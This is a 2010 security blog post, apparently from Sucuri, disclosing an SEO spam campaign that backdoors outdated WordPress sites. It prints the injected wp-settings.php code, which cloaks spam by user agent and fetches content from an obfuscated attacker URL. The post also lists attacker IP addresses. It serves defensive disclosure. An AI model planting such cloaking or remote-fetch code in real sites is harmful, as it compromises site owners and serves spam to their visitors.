Blackhat SEO Spam C&C: wseow and seotoos up to no good!

  • September 15, 2010

We have been tracking these Blackhat SEO Spam C&C (command and control) servers for a while and thought it would be a good time to expose some of the details.

They have been actively trying to exploit blogs using old versions of WordPress to use them as part of their spam network.

IP addresses used:
94.75.221.117
94.75.221.118

Malware being used:
On the sites we’ve analyzed so far, wp-settings.php and index.php are hacked to load the SPAM, and to serve as a backdoor to the attackers.

This is the code added to the bottom of wp-settings.php:

http://sucuri.net/?page=tools&title=blacklist&detail=fe7b3ef5bba0429150672dfea5a66109

$server_user_agent = @$_SERVER['HTTP_USER_AGENT'];
$stop_agents_masks = array("Teoma", "alexa", "froogle", "inktomi", 
"looksmart", "URL_Spider_SQL", "Firefly", "NationalDirectory", 
"Ask Jeeves", "TECNOSEEK", "InfoSeek", "WebFindBot", "girafabot", 
"crawler", "www.galaxy.com", "Googlebot", "Msnbot", "Scooter", 
"Slurp", "appie", "FAST", "WebBug", "Spade", "ZyBorg", "rabaz", "
Bing", "YoudaoBot", "Baiduspider", "Yeti");
foreach($stop_agents_masks as $stop_agents_mask) if(eregi(
$stop_agents_mask, $server_user_agent) !== false)
{$is_human = false; break;}if(!$is_human){
if(function_exists('wp_cache_clean_cache')&&isset($file_prefix)) 
wp_cache_clean_cache($file_prefix);$x0b=@wp_remote_fopen
("x68x74x74160x3ax2f57x77163x65157167x2e
143x6f155x2f156x2f120x6814162x31x59150153
147x4bx49153x6a131x6516357163x65x72x69x61
154x69x7a145x64");}

You can see the wp_remote_fopen doing a call to http://wseow dot com/n/Pha21YhkgKIkjYes/serialized

Affected sites:

There seems to be a lot of sites affected according to Google. Their main spam is about: “We Are The CHEAPEST Online – Drugstore”, so if you search for that you will find thousands of entries:

Most of the sites we’ve checked with ourscannerhave been out of date using very old versions of WordPress (from 2.1 to 2.7).

So for any WordPress user out there, make sure to update your blogs.

For hosting providers, we recommend that you block those IP addresses to protect your customers. In fact, we recommend blocking all those IP addresses (small list right now, but we will be updating it constantly moving forward).

We will post more details as we learn more about this attack.

If your site has been hacked and you need help, visit http://sucuri.net to learn about our malware removal and monitoring plans.

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Related Tags
1 comment
  1. Pingback: Tweets that mention Blackhat SEO Spam C&C: wseow and seotoos up to no good! | Sucuri -- Topsy.com

Comments are closed.

Related Categories
You May Also Like